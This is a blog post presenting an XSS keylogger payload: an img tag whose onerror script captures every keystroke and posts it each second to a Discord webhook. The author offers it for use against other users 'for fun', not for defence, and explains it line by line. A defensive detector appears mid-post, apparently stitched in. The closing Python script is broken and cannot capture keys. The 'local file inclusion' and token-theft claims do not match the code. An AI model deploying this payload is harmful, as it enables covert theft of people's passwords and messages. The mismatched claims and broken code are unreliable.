Discord Keypress Webhook Exploit

Sleep
2 min read · Jan 20, 2023


Today I am sharing a very nice exploit for the Discord application.
What this code does is hijack a user's token via a webhook using local file inclusion, allowing us to keylog the user's every keystroke.

<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>

Above is the payload itself, but I will show you a more exciting way to explore the endless script-kid selfbot hard chatter's day by gaining not only access to their Discord account but to their every keystroke, meaning that we become the gatekeeper of their syskey.
This code installs an event listener that captures every key press made by the user on the webpage and sends the pressed keys to a Discord webhook every second.

The onerror attribute is being used to execute JavaScript code when an error occurs while loading the image specified in the src attribute. Since no image is specified, this code will always execute.

The let x=!1 initializes a boolean variable x with a value of false. The l variable is initialized as an empty string. The document.onkeypress event listener captures every key press made by the user on the webpage and appends the pressed key to the l string. The x variable is set to true to indicate that a key has been pressed.

The setInterval function executes the anonymous function inside it every 1000 milliseconds (1 second). The anonymous function checks if x is true. If it is, it sends an HTTP POST request to the specified Discord webhook with the Content-Type header set to application/json and the body set to a JSON string of the l variable. The x variable is then set to false to reset it for the next key press.
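For anyone rendering or relaying user-supplied HTML, the useful counterpart to the walkthrough above is a check that recognises this exfiltration pattern: an inline event handler on a tag (here `onerror` on an `<img>` with no real `src`), a keyboard hook, and a fetch to a Discord webhook URL. The following detector is an added example, not code from the original post; the sample inputs are constructed, and the webhook ids are placeholders.

```python
import re

# Indicators drawn from the payload above. "webhooks?" covers both the /api/webhook/
# spelling used in the post and Discord's /api/webhooks/ path.
INLINE_HANDLER = re.compile(r"<\s*\w+[^>]*\bon\w+\s*=", re.IGNORECASE)
WEBHOOK_URL = re.compile(
    r"(?:https?:)?//(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks?/", re.IGNORECASE
)
EXFIL_CALL = re.compile(r"\b(?:fetch|XMLHttpRequest|navigator\.sendBeacon)\b", re.IGNORECASE)
KEY_HOOK = re.compile(r"\bon(?:keypress|keydown|keyup)\b|addEventListener\s*\(\s*['\"]key", re.IGNORECASE)


def classify(content: str) -> dict:
    """Return which indicators fire on one piece of content plus an overall verdict."""
    hits = {
        "inline_handler": bool(INLINE_HANDLER.search(content)),
        "webhook_url": bool(WEBHOOK_URL.search(content)),
        "exfil_call": bool(EXFIL_CALL.search(content)),
        "key_hook": bool(KEY_HOOK.search(content)),
    }
    # An inline handler that names a webhook is the payload shape itself: block it.
    # A webhook URL next to a network call, with no markup, may be a legitimate
    # integration being discussed, so it only goes to review.
    if hits["inline_handler"] and hits["webhook_url"]:
        verdict = "block"
    elif hits["webhook_url"] and hits["exfil_call"]:
        verdict = "review"
    else:
        verdict = "allow"
    return {"verdict": verdict, **hits}


# Constructed samples: a stand-in for the payload above (webhook id replaced by a
# placeholder), a harmless image tag, and a plain mention of a webhook integration.
SAMPLES = {
    "payload": "<img src onerror='let l=\"\";document.onkeypress=e=>{l+=e.key};"
               "setInterval(()=>fetch(\"//discord.com/api/webhook/PLACEHOLDER\","
               "{method:\"post\",body:JSON.stringify({content:l})}),1000)'>",
    "benign_image": '<img src="https://example.com/cat.png" alt="a cat">',
    "webhook_mention": "CI posts build results with fetch() to "
                       "https://discord.com/api/webhooks/000/PLACEHOLDER",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, classify(text))
```

Pattern matching like this is a last line of defence; a Content-Security-Policy whose `script-src` omits `'unsafe-inline'` stops the `onerror` handler from running at all, whatever the payload looks like.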

Now we can have some fun. Here is a Python script using this payload:

```python
import json
import time
import requests

x = False  # set once a key has been pressed since the last send
l = ""     # accumulated keys


def on_key_press(event):
    global x, l
    l += event.key
    x = True


def send_to_webhook():
    global x, l
    if x:
        requests.post(
            "//discord.com/api/webhook/...",
            headers={"Content-Type": "application/json"},
            data=json.dumps({"content": l}),
        )
        x = False


while True:
    send_to_webhook()
    time.sleep(1)
```

Big shoutout to Kyle Barnthouse from Hephaestus Security
for showing me the payload, and to Jack Rhysider for making me take a second look at what was possible. Also a big thanks to Discord security for denying my writeup and refusing to fix a very critical data privacy issue. Thanks guys, keep on watching cartoons and whatnot and ignoring the fact that this is a serious issue.

Written with love, Taylor Christian Newsome.
